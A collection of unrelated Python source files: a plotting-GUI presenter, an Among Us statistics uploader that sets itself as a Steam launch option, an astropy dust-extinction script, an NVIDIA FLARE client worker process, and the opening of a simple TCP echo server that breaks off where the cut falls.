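        # start_bin = 0, so the FFT below uses the first 100 points of the asymmetry.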
z, fft = objects.Asymmetry.fft(asymmetry[start_bin:start_bin + num_bins], time[start_bin:start_bin + num_bins], f_min, f_max)
return z, np.divide(fft, max(fft))
def _start_update(self, side):
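        # Note: _update_canvas(...) is invoked here rather than passed as a callable, so each
        # update actually runs synchronously on the GUI thread and Thread receives None as its
        # target; the Thread objects below therefore do no additional work.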
if side == 'left' or side == 'both':
threading.Thread(
target=self._update_canvas(self._view.left_settings, self._view.left_display, 'left', fast=False),
daemon=True).start()
if side == 'right' or side == 'both':
threading.Thread(
target=self._update_canvas(self._view.right_settings, self._view.right_display, 'right', fast=False),
daemon=True).start()
def _populate_settings(self):
        self.__populating_settings = True  # guard flag: repopulating the QComboBoxes below fires many change signals that should be ignored
ids = self._view.support_panel.item_tree.get_selected()
runs = self.__run_service.get_runs_by_ids(ids)
styles = [self.__style_service.get_style_by_run_id(rid) for rid in ids]
alphas = {'{:.5f}'.format(run.asymmetries[run.FULL_ASYMMETRY].alpha) for run in runs if
run.asymmetries[run.FULL_ASYMMETRY] is not None}
if len(alphas) == 1:
self._view.support_panel.asymmetry_param_box.alpha_input.setText(alphas.pop())
else:
self._view.support_panel.asymmetry_param_box.alpha_input.setText('1.0')
self.__update_alpha = True
if len(styles) > 1:
self._populate_with_multiple_selected(styles)
elif len(styles) == 1:
self._populate_with_single_selected(styles)
else:
pass
self.__populating_settings = False
def _populate_with_single_selected(self, styles):
"""
This method populates the combo boxes in the Plot Style group with the style of the run selected.
"""
style = styles[0]
self._view.support_panel.set_errorbar_color(
self.__style_service.color_options_extra[style[self.__style_service.Keys.ERRORBAR_COLOR]])
self._view.support_panel.set_default_color(
self.__style_service.color_options[style[self.__style_service.Keys.DEFAULT_COLOR]])
self._view.support_panel.set_fit_color(
self.__style_service.color_options_extra[style[self.__style_service.Keys.FIT_COLOR]])
self._view.support_panel.set_errorbar_style(
self.__style_service.errorbar_styles[style[self.__style_service.Keys.ERRORBAR_STYLE]])
self._view.support_panel.set_errorbar_width(
self.__style_service.errorbar_width[style[self.__style_service.Keys.ERRORBAR_WIDTH]])
self._view.support_panel.set_fillstyle(
self.__style_service.fillstyle_options[style[self.__style_service.Keys.FILLSTYLE]])
self._view.support_panel.set_line_color(
self.__style_service.color_options_extra[style[self.__style_service.Keys.LINE_COLOR]])
self._view.support_panel.set_line_width(
self.__style_service.line_width_options[style[self.__style_service.Keys.LINE_WIDTH]])
self._view.support_panel.set_linestyle(
self.__style_service.linestyle_options[style[self.__style_service.Keys.LINESTYLE]])
self._view.support_panel.set_marker(
self.__style_service.marker_options[style[self.__style_service.Keys.MARKER]])
self._view.support_panel.set_marker_color(
self.__style_service.color_options_extra[style[self.__style_service.Keys.MARKER_COLOR]])
self._view.support_panel.set_marker_size(
self.__style_service.marker_size_options[style[self.__style_service.Keys.MARKER_SIZE]])
def _populate_with_multiple_selected(self, styles):
"""
This method populates the combo boxes in the Plot Style group with the style of the runs selected.
"""
values = {self.__style_service.color_options[style[self.__style_service.Keys.DEFAULT_COLOR]] for style in
styles}
if len(values) > 1:
self._view.support_panel.set_default_color("*")
else:
self._view.support_panel.set_default_color(values.pop())
values = {self.__style_service.errorbar_width[style[self.__style_service.Keys.ERRORBAR_WIDTH]] for style in
styles}
if len(values) > 1:
self._view.support_panel.set_errorbar_width("*")
else:
self._view.support_panel.set_errorbar_width(values.pop())
values = {self.__style_service.color_options_extra[style[self.__style_service.Keys.ERRORBAR_COLOR]] for style in
styles}
if len(values) > 1:
self._view.support_panel.set_errorbar_color("*")
else:
self._view.support_panel.set_errorbar_color(values.pop())
values = {self.__style_service.color_options_extra[style[self.__style_service.Keys.FIT_COLOR]] for style in
styles}
if len(values) > 1:
self._view.support_panel.set_fit_color("*")
else:
self._view.support_panel.set_fit_color(values.pop())
values = {self.__style_service.errorbar_styles[style[self.__style_service.Keys.ERRORBAR_STYLE]] for style in
styles}
if len(values) > 1:
self._view.support_panel.set_errorbar_style("*")
else:
self._view.support_panel.set_errorbar_style(values.pop())
values = {self.__style_service.marker_size_options[style[self.__style_service.Keys.MARKER_SIZE]] for style in
styles}
if len(values) > 1:
self._view.support_panel.set_marker_size("*")
else:
self._view.support_panel.set_marker_size(values.pop())
values = {self.__style_service.line_width_options[style[self.__style_service.Keys.LINE_WIDTH]] for style in
styles}
if len(values) > 1:
self._view.support_panel.set_line_width("*")
else:
self._view.support_panel.set_line_width(values.pop())
values = {self.__style_service.linestyle_options[style[self.__style_service.Keys.LINESTYLE]] for style in
styles}
if len(values) > 1:
self._view.support_panel.set_linestyle("*")
else:
self._view.support_panel.set_linestyle(values.pop())
values = {self.__style_service.fillstyle_options[style[self.__style_service.Keys.FILLSTYLE]] for style in
styles}
if len(values) > 1:
self._view.support_panel.set_fillstyle("*")
else:
self._view.support_panel.set_fillstyle(values.pop())
values = {self.__style_service.color_options_extra[style[self.__style_service.Keys.MARKER_COLOR]] for style in
styles}
if len(values) > 1:
self._view.support_panel.set_marker_color("*")
else:
self._view.support_panel.set_marker_color(values.pop())
values = {self.__style_service.color_options_extra[style[self.__style_service.Keys.LINE_COLOR]] for style in
styles}
if len(values) > 1:
self._view.support_panel.set_line_color("*")
else:
self._view.support_panel.set_line_color(values.pop())
values = {self.__style_service.marker_options[style[self.__style_service.Keys.MARKER]] for style in styles}
if len(values) > 1:
self._view.support_panel.set_marker("*")
else:
self._view.support_panel.set_marker(values.pop())
|
AmongUsStats.py
|
import PySimpleGUIQt as sg
import winreg
import threading
import time
import datetime
import json
import requests
import subprocess
import os, os.path
import sys, glob
import psutil
# If the application is run as a PyInstaller bundle, the bootloader sets sys.frozen = True and stores the bundle's path in sys._MEIPASS.
if getattr(sys, 'frozen', False):
APP_DIR = sys._MEIPASS
APP_EXE = sys.executable.replace('\\','\\\\')
else:
APP_DIR = os.path.dirname(os.path.abspath(__file__))
APP_EXE = os.path.abspath(__file__).replace('\\','\\\\')
def subprocess_args(include_stdout=True):
if hasattr(subprocess, 'STARTUPINFO'):
si = subprocess.STARTUPINFO()
si.dwFlags |= subprocess.STARTF_USESHOWWINDOW
env = os.environ
else:
si = None
env = None
if include_stdout:
ret = {'stdout': subprocess.PIPE}
else:
ret = {}
ret.update({'stdin': subprocess.PIPE,
'stderr': subprocess.PIPE,
'startupinfo': si,
'env': env })
return ret
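# Illustrative use of the helper above (hypothetical command): run a console program
# without flashing a console window on Windows.
#   subprocess.call(['TASKKILL', '/F', '/IM', 'notepad.exe'], **subprocess_args(include_stdout=False))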
# List of all currently monitored Statistics, including 7 unknown ones that are being collected.
stats = ['Bodies Reported',
'Emergencies Called',
'Tasks Completed',
'All Tasks Completed',
'Sabotages Fixed',
'Impostor Kills',
'Times Murdered',
'Times Ejected',
'Crewmate Streak',
'Times Impostor',
'Times Crewmate',
'Games Started',
'Games Finished',
'Crewmate Vote Wins',
'Crewmate Task Wins',
'Impostor Vote Wins',
'Impostor Kill Wins',
'Impostor Sabotage Wins',
'Unknown 1',
'Unknown 2',
'Unknown 3',
'Unknown 4',
'Unknown 5',
'Unknown 6',
'Unknown 7'
]
# Function to set windows registry keys
def set_reg(name, value, reg_path):
try:
winreg.CreateKey(winreg.HKEY_CURRENT_USER, reg_path)
registry_key = winreg.OpenKey(winreg.HKEY_CURRENT_USER, reg_path, 0,
winreg.KEY_WRITE)
winreg.SetValueEx(registry_key, name, 0, winreg.REG_SZ, value)
winreg.CloseKey(registry_key)
return True
except WindowsError:
return False
# Function to get Windows registry keys
def get_reg(name, reg_path):
try:
registry_key = winreg.OpenKey(winreg.HKEY_CURRENT_USER, reg_path, 0,
winreg.KEY_READ)
value, regtype = winreg.QueryValueEx(registry_key, name)
winreg.CloseKey(registry_key)
return value
except WindowsError:
return None
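# Illustrative usage of the registry helpers above (the value name "Example" is a placeholder):
#   set_reg("Example", "123", r"SOFTWARE\Among Us Stat Grabber")   # -> True on success
#   get_reg("Example", r"SOFTWARE\Among Us Stat Grabber")          # -> "123", or None if missing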
# List of Static Values used within the script
AMONG_US_EXE = "Among Us.exe"
APP_NAME = "Among Us: Statistics Grabber"
GAME_ID = "945360"
ICON = rf"{APP_DIR}\images\icon.ico"
LAUNCH_OPTIONS = rf' "LaunchOptions" "\"{APP_EXE}\" %command%"'
REG_STEAM = r"SOFTWARE\Valve\Steam"
REG_AMONG_US = r"SOFTWARE\Among Us Stat Grabber"
STAT_DIR = rf"C:\Users\{os.getlogin()}\AppData\LocalLow\Innersloth\Among Us"
STEAM_CONFIG_PATH = get_reg(r"SteamPath", REG_STEAM) + "/userdata/{}" + "/config/localconfig.vdf"
STEAM_EXE = "steam.exe"
STEAM_EXE_PATH = get_reg(r"SteamExe", REG_STEAM)
STEAMID64 = 76561197960265728
VERSION = "1.0"
# Check to see if REST URL exists in registry. If so, use this value instead of default
if get_reg(r"REST Endpoint", REG_AMONG_US):
URL = get_reg(r"REST Endpoint", REG_AMONG_US)
else:
URL = 'https://amongus.demix.network/leaderboard'
# Function to extract the unique Among Us User ID from file
def getID(file):
with open(file, 'r') as f:
userArray = f.readline()
x = json.loads(userArray[4:])
return x['userid']
# Function to convert the raw bytes in the statistics file into readable values
def bytes_to_int(bytes):
result = 0
for b in bytes:
result = result * 256 + int(b)
return result
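# Example (illustrative): the bytes are interpreted big-endian, so
#   bytes_to_int(b'\x01\x00') == 256 and bytes_to_int(b'\x2a') == 42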
# Function to check if a particular process is running or not
def process_running(process):
    for p in psutil.process_iter(attrs=['pid', 'name']):
        if p.info['name'] == process:
            return True
    return False
# Function to Log messages to a file - Useful for debugging perhaps
def log(message):
f = open(rf"{STAT_DIR}\statGrabber.log", "a")
f.write(f"{datetime.datetime.now().strftime('%d-%m-%Y %H:%M:%S')}: {message}\n")
f.close()
# Function to extract Among Us nickname from file
def grabNickname():
with open(rf"{STAT_DIR}\playerPrefs") as file:
return file.readline().split(',')[0]
# Function to put together all statistics and upload them to REST endpoint
def grabStats():
data = {}
data['User ID'] = getID(max(glob.glob(os.path.join(rf"{STAT_DIR}\Unity\*\Analytics\ArchivedEvents", '*/')), key=os.path.getmtime) + "e")
data['Nickname'] = grabNickname()
data['lastUpdated'] = datetime.datetime.now().strftime('%d-%m-%Y %H:%M:%S')
with open(rf"{STAT_DIR}\playerStats2", "rb") as f:
i = -1
n = 4
x = 0
while (byte := f.read(1)):
if i % n == 0:
try:
data[stats[x]] = bytes_to_int(byte)
except IndexError:
break
x += 1
i += 1
payload = json.dumps(data)
headers = {'Content-type': 'application/json', 'Accept': 'text/plain'}
try:
response = requests.post(URL, data = payload, headers=headers)
if response.status_code == 200:
log('Successfully uploaded player statistics')
else:
            log(f'Failed to upload player statistics to {URL} (HTTP status {response.status_code})')
except requests.exceptions.RequestException as e:
        log('The following error occurred while trying to upload player statistics:')
log(e)
# Function to run the thread that will monitor for changes to the stats file and push updates
def run():
# Launch game from the argument passed to this program (Game Executable Path)
os.startfile(sys.argv[1])
# Log the client opening
log("Among Us has been launched")
# Grab statistics upon loading the game
grabStats()
# Wait for process to load before checking status
time.sleep(5)
# Grab last modified timestamp for player statistics as a baseline
lastModifiedStats = os.stat(rf"{STAT_DIR}\playerStats2").st_mtime
# Loop to check for updates to current player statistics file
while process_running(AMONG_US_EXE):
statsModified = os.stat(rf"{STAT_DIR}\playerStats2").st_mtime
if statsModified > lastModifiedStats:
log("Change to statistics detected. Uploading latest statistics")
grabStats()
lastModifiedStats = statsModified
time.sleep(10)
# Log the game closing
log("Among Us has been closed")
# Exit the script completely
os._exit(1)
# Function that updates Steam config to run application when starting Among Us
def updateConfig(file):
count = 0
addHere = False
with open(file, 'r+', encoding="utf8") as fd:
contents = fd.readlines()
if GAME_ID in contents[-1]:
contents.append(LAUNCH_OPTIONS)
else:
for index, line in enumerate(contents):
if GAME_ID in line:
if count == 1:
addHere = True
count += 1
if addHere:
if "}" in line:
if 'LaunchOptions' not in contents[index - 1]:
contents.insert(index, LAUNCH_OPTIONS + '\n')
else:
del contents[index - 1]
contents.insert(index - 1, LAUNCH_OPTIONS + '\n')
break
fd.seek(0)
fd.writelines(contents)
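# Rough sketch of the line updateConfig writes into localconfig.vdf under the Among Us
# (945360) entry so that Steam launches this program in front of the game (the .exe path
# shown is hypothetical; APP_EXE supplies the real one):
#
#   "945360"
#   {
#       ...
#        "LaunchOptions" "\"C:\\AmongUsStats\\AmongUsStats.exe\" %command%"
#   }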
# Function to open the GUI which allows users to change settings, etc
def openGUI(mode):
# Define URL as global so we can change the value in the updater thread too
global URL
# Path to loginusers.vdf file which contains list of all Steam accounts on PC
steamUsers = get_reg(r"SteamPath", REG_STEAM) + "/config/loginusers.vdf"
# Extract the currently used profile from the windows registry (if it exists)
defaultProfile = get_reg(r"SteamUser", REG_AMONG_US)
# Dictionary which will store Steam Alias & ID used for config directory path
userKey = {}
# Array containing a list of all Steam Aliases - Used to lookup above dictionary
userVal = []
# Set the overall theme of the window to "Dark Blue"
sg.theme('DarkBlue')
# Open the config file that contains list of all Steam accounts and extract required info
with open(steamUsers) as f:
lines = f.readlines()
i = 0
for line in lines:
if "PersonaName" in line:
userKey[(line.replace('\t\t"PersonaName"\t\t', '').replace('"','').replace('\n', ''))] = int(lines[i - 3].replace('\t','').replace('"', '')) - STEAMID64
userVal.append(line.replace('\t\t"PersonaName"\t\t', '').replace('"','').replace('\n', ''))
i += 1
# Define the layout of our GUI and the conditions required
layout = [
[sg.Text("Steam Profile to use:")],
[sg.Combo(userVal, default_value=defaultProfile, enable_events=True, key='-PROFILE-', readonly=True, size=(30,1), disabled=True if mode == "BACKGROUND" else False)],
[sg.Text(size=(30,0.5))],
[sg.Text("REST Endpoint to upload Statistics to:")],
[sg.In(URL, size=(30, 1), enable_events=True, key="-REST-")],
[sg.Button('Test Endpoint',size=(10,1), disabled=True, button_color=('grey', 'lightgrey')),sg.Text(key="-STATUS-")],
[sg.Text(size=(30,0.5))],
[sg.Button('Apply' if mode == "BACKGROUND" else "Install"), sg.Button('Close' if mode == 'BACKGROUND' else 'Exit')]
]
layoutPopup = [
[sg.Text('Steam will be closed while\nchanges are made.\n\nWould you like to continue?\n')],
[sg.Button('Yes'), sg.Button('No')]
]
layoutPopup2 = [
[sg.Text('You can now play Among us as normal.\n\nClick OK to exit setup.')],
[sg.Button('OK')]
]
# Create the window
window = sg.Window(APP_NAME, layout, auto_size_buttons=True, resizable=False, disable_close=False, disable_minimize=True, icon=ICON)
# Create an event loop
while True:
event, values = window.read()
# If Exit/Close or the X are pressed, exit the GUI loop
if event == "Exit" or event == "Close" or event == sg.WIN_CLOSED:
break
# If any change is detected to the Steam Profile dropdown, re-enable the Install button
if event == "-PROFILE-":
window['Install' if mode == 'INTERACTIVE' else 'Apply'].update(disabled=False)
window['Install' if mode == 'INTERACTIVE' else 'Apply'].update(button_color=('black', 'white'))
# If the Test Endpoint button is pressed, Disable button & ping endpoint.
if event == "Test Endpoint":
window['Test Endpoint'].update(disabled=True)
window['Test Endpoint'].update(button_color=('grey', 'lightgrey'))
try:
response = requests.post(values['-REST-'])
if response.status_code == 200:
window['-STATUS-'].update('Success', text_color='green')
else:
window['-STATUS-'].update('Failed', text_color='red')
except requests.exceptions.RequestException as e:
                log('The following error occurred while trying to test the REST Endpoint:')
log(values['-REST-'])
log(e)
# If change detected to the -REST- string then re-enable install & test buttons
if event == "-REST-":
window['Test Endpoint'].update(disabled=False)
window['Test Endpoint'].update(button_color=('black', 'white'))
window['Install' if mode == 'INTERACTIVE' else 'Apply'].update(disabled=False)
window['Install' if mode == 'INTERACTIVE' else 'Apply'].update(button_color=('black', 'white'))
# If Install/Update selected then update all relevant values to registry
if event == "Install" or event == "Apply":
steamOpen = False
# Disable Install/Update button to stop spam
window['Install' if mode == 'INTERACTIVE' else 'Apply'].update(disabled=True)
window['Install' if mode == 'INTERACTIVE' else 'Apply'].update(button_color=('grey', 'lightgrey'))
# If Steam is running and application running in interactive mode, close it first
if mode == "INTERACTIVE" and process_running(STEAM_EXE):
warningPopup = sg.Window("Alert!", layoutPopup, auto_size_buttons=True, resizable=False, disable_close=False, disable_minimize=True, icon=ICON)
closeSteam = warningPopup.read()
warningPopup.close()
if closeSteam[0] == 'Yes':
subprocess.call(["TASKKILL","/F","/IM",STEAM_EXE], shell=True)
time.sleep(2)
steamOpen = True
else:
continue
set_reg(r"Install Path", APP_EXE, REG_AMONG_US)
set_reg(r"SteamUser", values['-PROFILE-'], REG_AMONG_US)
set_reg(r"SteamDir", str(userKey[values['-PROFILE-']]), REG_AMONG_US)
set_reg(r"REST Endpoint", values['-REST-'], REG_AMONG_US)
set_reg(r"Version", VERSION, REG_AMONG_US)
URL = values['-REST-']
updateConfig(STEAM_CONFIG_PATH.format(userKey[values['-PROFILE-']]))
if mode == "INTERACTIVE":
sg.Window("Script has been Installed!", layoutPopup2, auto_size_buttons=True, resizable=False, disable_close=False, disable_minimize=True, icon=ICON).read()
if steamOpen:
subprocess.Popen(STEAM_EXE_PATH)
break
else:
sg.popup("Settings have been successfully applied.")
window.close()
# Function that controls the main loop of the program & the tray icon
def mainGUI(mode):
# Build tray menu & create tray
menu_def = ['BLANK', ['Settings', 'About', '---', 'Exit']]
tray = sg.SystemTray(menu=menu_def, filename=ICON, tooltip=APP_NAME)
# Main event loop
while True:
if mode == "INTERACTIVE":
openGUI(mode)
break
# React to any events from the tray menu
menu_item = tray.read()
if menu_item == 'Exit':
break
elif menu_item == 'Settings':
openGUI(mode)
# Entry function that detects which mode the application has been opened in.
def main():
# If ran via Steam & Reg Keys found, run in Background mode
if get_reg(r"Install Path", REG_AMONG_US) and len(sys.argv) >= 2:
thread = threading.Thread(target=run, args=())
thread.daemon = True
thread.start()
mode = "BACKGROUND"
# Otherwise, run in interactive mode, loading the GUI.
else:
mode = "INTERACTIVE"
# Call main GUI function with current mode as a parameter
mainGUI(mode)
if __name__ == '__main__':
main()
|
randomGal.py
|
#randomGal.py
from astropy import units as u
from astropy import coordinates
from astroquery.ned import Ned
from astroquery.irsa_dust import IrsaDust
from astropy.coordinates import Angle,ICRS,SkyCoord
from astropy.coordinates.name_resolve import NameResolveError
import math
import os.path
import sys
import itertools
import threading
import time
import requests
from astropy.coordinates import SkyCoord
from random import randint
#LOOK AT QUICKDATA.PY FOR MULTIPLE GALAXY CONFIG
def getRandomCoordinate():
h = randint(0,23)
# print("h = " + str(h))
m = randint(0,59)
# print("m = " + str(m))
s = randint(0,59)
# print("s = " + str(s))
d = randint(-89,89)
# print("d = " + str(d))
arcm = randint(0,59)
# print("arcm = " + str(arcm))
arcs = randint(0,59)
# print("arcs = " + str(arcs))
ra = Angle((h, m, s), unit=u.hour) #creating right ascension angle
dec = Angle((d, arcm, arcs), unit=u.deg) #creating declination angle
# print(ra.to_string())
# print(dec.to_string())
return SkyCoord(ra, dec, frame = 'fk5')
# import pandas as pd:
import csv
def readCoordinate():
    names = [None]*462 #there are 462 entries
    coords = [None]*462
    read_file = 'cepheidGals.csv'
    i = 0
with open(read_file) as csvinp:
reader = csv.reader(csvinp,delimiter = ',')
for row in reader:
names[i] = row[0]
try:
tcoord = SkyCoord.from_name(row[0],frame = 'icrs')
coords[i] = tcoord
except:
print(row[0])
i-=1
# ra = row[1]
# dec = row[2]
#SkyCoord(ra,dec,frame = 'fk5')
i+=1
return [names,coords]
def timeFix(s,m,h): #keeps seconds and minutes within 0-59, carrying overflow into the hours (0-23)
if(s>=60 or m>=60):
while(s>=60 or m>=60):
if s >= 60:
m+=1
s-=60
if m >= 60:
if h == 23:
h = 0
m-=60
else:
h+=1
m-=60
elif(s<0 or m<0):
while(s<0 or m<0):
if s < 0:
m-=1
s+=60
if m < 0:
if h == 0:
h = 23
m+=60
else:
h-=1
m+=60
return s,m,h;
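# Example (illustrative): timeFix(75, 59, 10) carries 75 s into the minutes and the
# resulting 60 min into the hours, returning (15, 0, 11).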
def fourCoord(dam,ra,dec,coord):
ds = dam*4
coord[0] = ra.to_string()+" "+dec.to_string()
#n
decli = dec.arcminute+dam
if decli > 90:
decli -=90
decl = Angle(decli,u.arcminute)
decl = Angle(decl.to_string(unit=u.degree),u.degree)
coord[1] = ra.to_string()+" "+decl.to_string()
#e
ds/=math.cos(math.radians(dec.degree))
h = ra.hms.h
m = ra.hms.m
s = ra.hms.s+ds
(s,m,h) = timeFix(s,m,h)
rad = Angle((h,m,s), unit = u.hour)
rad = Angle(rad.to_string(unit=u.hour),u.hour)
coord[2] = rad.to_string()+" "+dec.to_string()
#w
    ds = ds*(-1)  # reuse the cos(dec)-corrected offset from the east step, flipped to move west
h = ra.hms.h
m = ra.hms.m
s = ra.hms.s+ds
(s,m,h) = timeFix(s,m,h)
rad = Angle((h,m,s), unit = u.hour)
rad = Angle(rad.to_string(unit=u.hour),u.hour)
coord[4] = rad.to_string()+" "+dec.to_string()
#s
decli = dec.arcminute-dam
if decli < 0:
decli +=90
decl = Angle(decli,u.arcminute)
decl = Angle(decl.to_string(unit=u.degree),u.degree)
coord[3] = ra.to_string()+" "+decl.to_string()
#print(coord)
return coord; #performs transformation of initial coord into cardinal coordinates
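# Illustrative numbers for the east/west step above: 1 arcminute corresponds to 4 seconds
# of right ascension on the equator, so a 20-arcminute offset is 80 s of RA at dec = 0 and
# 80 / cos(60 deg) = 160 s of RA at dec = 60 deg.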
def tableFill(dam, ra, dec):
    curVal = [None] *5 #center = 0, n = 1, e = 2, s = 3, w = 4
    coord = [None] *5 #center = 0, n = 1, e = 2, s = 3, w = 4
#get values for each arcminute
for j in range(dam,dam+1): #change 1st dam to 0 for concurrent values
coord = fourCoord(j, ra, dec, coord)
for i in range(0,5):
try:
C = coordinates.SkyCoord(coord[i])
table = IrsaDust.get_extinction_table(C.fk5, show_progress = False)
curVal[i] = (table['A_SandF'][2])
except Exception as e:
curVal = [None] * 5
break
# output1.write('\n')
return curVal
def animate():
for c in itertools.cycle(['|', '/', '-', '\\']):
if done:
break
sys.stdout.write('\rloading ' + c)
sys.stdout.flush()
time.sleep(0.1)
print(chr(27) + "[2J")
sys.stdout.write('\rDone!')
# MAIN FUNCTION
if __name__ == '__main__':
write_file = 'randomAV.csv'
arcMinutes = 20
done = False
print(chr(27) + "[2J")
threader = threading.Thread(target=animate)
threader.start()
coords = [None] * 462
avData = [None] * len(coords)
with open(write_file,'w') as output:
output.write(str(arcMinutes) + " Arcminutes\nCenter, North, East, South, West\n")
output.close()
[names, coords] = readCoordinate()
for i in range(0,len(coords)):
# coords[i] = getRandomCoordinate()
with open(write_file,'a') as output1:
try:
avData[i] = tableFill(arcMinutes,coords[i].ra,coords[i].dec)
output1.write(str(names[i]) + ',' + str(coords[i].ra.to_string(unit = u.hour)) + ',' + str(coords[i].dec.to_string()) + '\n')
for j in avData[i]:
output1.write(str(j) + ',')
output1.write('\n')
output1.close()
print('\n'+str(len(coords)-1-i) + " left!")
except Exception as e:
print(e)
done = True
|
worker_process.py
|
# Copyright (c) 2021-2022, NVIDIA CORPORATION. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Provides a command line interface for a federated client trainer."""
import argparse
import logging
import logging.config
import os
import sys
import threading
import time
import psutil
from nvflare.apis.fl_constant import FLContextKey, WorkspaceConstants
from nvflare.apis.workspace import Workspace
from nvflare.fuel.sec.security_content_service import SecurityContentService
from nvflare.fuel.utils.argument_utils import parse_vars
from nvflare.private.defs import EngineConstant
from nvflare.private.fed.app.fl_conf import FLClientStarterConfiger
from nvflare.private.fed.client.client_json_config import ClientJsonConfigurator
from nvflare.private.fed.client.client_run_manager import ClientRunManager
from nvflare.private.fed.client.client_runner import ClientRunner
from nvflare.private.fed.client.client_status import ClientStatus
from nvflare.private.fed.client.command_agent import CommandAgent
from nvflare.private.fed.utils.fed_utils import add_logfile_handler
def check_parent_alive(parent_pid, stop_event: threading.Event):
while True:
if stop_event.is_set():
break
if not psutil.pid_exists(parent_pid):
# if parent is not alive, kill its worker process
os.killpg(os.getpgid(os.getpid()), 9)
break
time.sleep(1)
def main():
"""Worker process start program."""
parser = argparse.ArgumentParser()
parser.add_argument("--workspace", "-m", type=str, help="WORKSPACE folder", required=True)
parser.add_argument("--startup", "-w", type=str, help="startup folder", required=True)
parser.add_argument("--token", "-t", type=str, help="token", required=True)
parser.add_argument("--ssid", "-d", type=str, help="ssid", required=True)
parser.add_argument("--job_id", "-n", type=str, help="job_id", required=True)
parser.add_argument("--client_name", "-c", type=str, help="client name", required=True)
parser.add_argument("--listen_port", "-p", type=str, help="listen port", required=True)
parser.add_argument("--sp_target", "-g", type=str, help="Sp target", required=True)
parser.add_argument(
"--fed_client", "-s", type=str, help="an aggregation server specification json file", required=True
)
parser.add_argument("--set", metavar="KEY=VALUE", nargs="*")
parser.add_argument("--local_rank", type=int, default=0)
args = parser.parse_args()
kv_list = parse_vars(args.set)
# get parent process id
parent_pid = os.getppid()
args.train_config = os.path.join("config", "config_train.json")
config_folder = kv_list.get("config_folder", "")
secure_train = kv_list.get("secure_train", True)
if config_folder == "":
args.client_config = "config_fed_client.json"
else:
args.client_config = os.path.join(config_folder, "config_fed_client.json")
args.config_folder = config_folder
args.env = os.path.join("config", "environment.json")
try:
remove_restart_file(args)
except BaseException:
print("Could not remove the restart.fl / shutdown.fl file. Please check your system before starting FL.")
sys.exit(-1)
restart_file = os.path.join(args.workspace, "restart.fl")
if os.path.exists(restart_file):
os.remove(restart_file)
print("starting the client .....")
startup = os.path.join(args.workspace, "startup")
SecurityContentService.initialize(content_folder=startup)
thread = None
stop_event = threading.Event()
deployer = None
command_agent = None
federated_client = None
startup = args.startup
app_root = os.path.join(
args.workspace,
WorkspaceConstants.WORKSPACE_PREFIX + str(args.job_id),
WorkspaceConstants.APP_PREFIX + args.client_name,
)
logging_setup(app_root, args, config_folder, startup)
log_file = os.path.join(args.workspace, args.job_id, "log.txt")
add_logfile_handler(log_file)
logger = logging.getLogger("worker_process")
logger.info("Worker_process started.")
try:
# start parent process checking thread
thread = threading.Thread(target=check_parent_alive, args=(parent_pid, stop_event))
thread.start()
conf = FLClientStarterConfiger(
app_root=startup,
client_config_file_name=args.fed_client,
log_config_file_name=args.log_config,
kv_list=args.set,
logging_config=False,
)
conf.configure()
deployer = conf.base_deployer
federated_client = deployer.create_fed_client(args, args.sp_target)
federated_client.status = ClientStatus.STARTING
federated_client.token = args.token
federated_client.ssid = args.ssid
federated_client.client_name = args.client_name
federated_client.fl_ctx.set_prop(FLContextKey.CLIENT_NAME, args.client_name, private=False)
federated_client.fl_ctx.set_prop(EngineConstant.FL_TOKEN, args.token, private=False)
federated_client.fl_ctx.set_prop(FLContextKey.WORKSPACE_ROOT, args.workspace, private=True)
client_config_file_name = os.path.join(app_root, args.client_config)
conf = ClientJsonConfigurator(
config_file_name=client_config_file_name,
)
conf.configure()
workspace = Workspace(args.workspace, args.client_name, config_folder)
run_manager = ClientRunManager(
client_name=args.client_name,
job_id=args.job_id,
workspace=workspace,
client=federated_client,
components=conf.runner_config.components,
handlers=conf.runner_config.handlers,
conf=conf,
)
federated_client.run_manager = run_manager
with run_manager.new_context() as fl_ctx:
fl_ctx.set_prop(FLContextKey.CLIENT_NAME, args.client_name, private=False)
fl_ctx.set_prop(EngineConstant.FL_TOKEN, args.token, private=False)
fl_ctx.set_prop(FLContextKey.WORKSPACE_ROOT, args.workspace, private=True)
fl_ctx.set_prop(FLContextKey.ARGS, args, sticky=True)
fl_ctx.set_prop(FLContextKey.APP_ROOT, app_root, private=True, sticky=True)
fl_ctx.set_prop(FLContextKey.WORKSPACE_OBJECT, workspace, private=True)
fl_ctx.set_prop(FLContextKey.SECURE_MODE, secure_train, private=True, sticky=True)
client_runner = ClientRunner(config=conf.runner_config, job_id=args.job_id, engine=run_manager)
run_manager.add_handler(client_runner)
fl_ctx.set_prop(FLContextKey.RUNNER, client_runner, private=True)
# Start the command agent
command_agent = CommandAgent(federated_client, int(args.listen_port), client_runner)
command_agent.start(fl_ctx)
federated_client.status = ClientStatus.STARTED
client_runner.run(app_root, args)
except BaseException as e:
logger.error(f"FL client execution exception: {e}", exc_info=True)
raise e
finally:
stop_event.set()
if command_agent:
command_agent.shutdown()
if deployer:
deployer.close()
if federated_client:
federated_client.close()
if thread and thread.is_alive():
thread.join()
def logging_setup(app_root, args, config_folder, startup):
app_log_config = os.path.join(app_root, config_folder, "log.config")
if os.path.exists(app_log_config):
args.log_config = app_log_config
else:
args.log_config = os.path.join(startup, "log.config")
log_config_file_path = os.path.join(app_root, args.log_config)
logging.config.fileConfig(fname=log_config_file_path, disable_existing_loggers=False)
def remove_restart_file(args):
"""To remove the restart.fl file.
Args:
args: command args
"""
restart_file = os.path.join(args.workspace, "restart.fl")
if os.path.exists(restart_file):
os.remove(restart_file)
restart_file = os.path.join(args.workspace, "shutdown.fl")
if os.path.exists(restart_file):
os.remove(restart_file)
if __name__ == "__main__":
"""
This is the program when starting the child process for running the NVIDIA FLARE executor.
"""
main()
|
tcp_server.py
|
# -*- coding:utf8 -*-
import socket
import threading
import time
def tcplink(sock, addr):
print("accept new connection from %s:%s..." % addr)
sock.send("Welcom!".encode())
while True:
data = sock.recv(1024)
time.sleep(1)
        if data == b'exit' or not data:
break
sock.send("hello: ".encode() + data)
sock.close()
print("Connection from %s:%s closed." % addr)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)  # create an IPv4 TCP socket
s.bind(('127.0.0.1', 9999))  # bind to the listening address and port
s.listen(5)
print("Waiting for connection......")
while True:
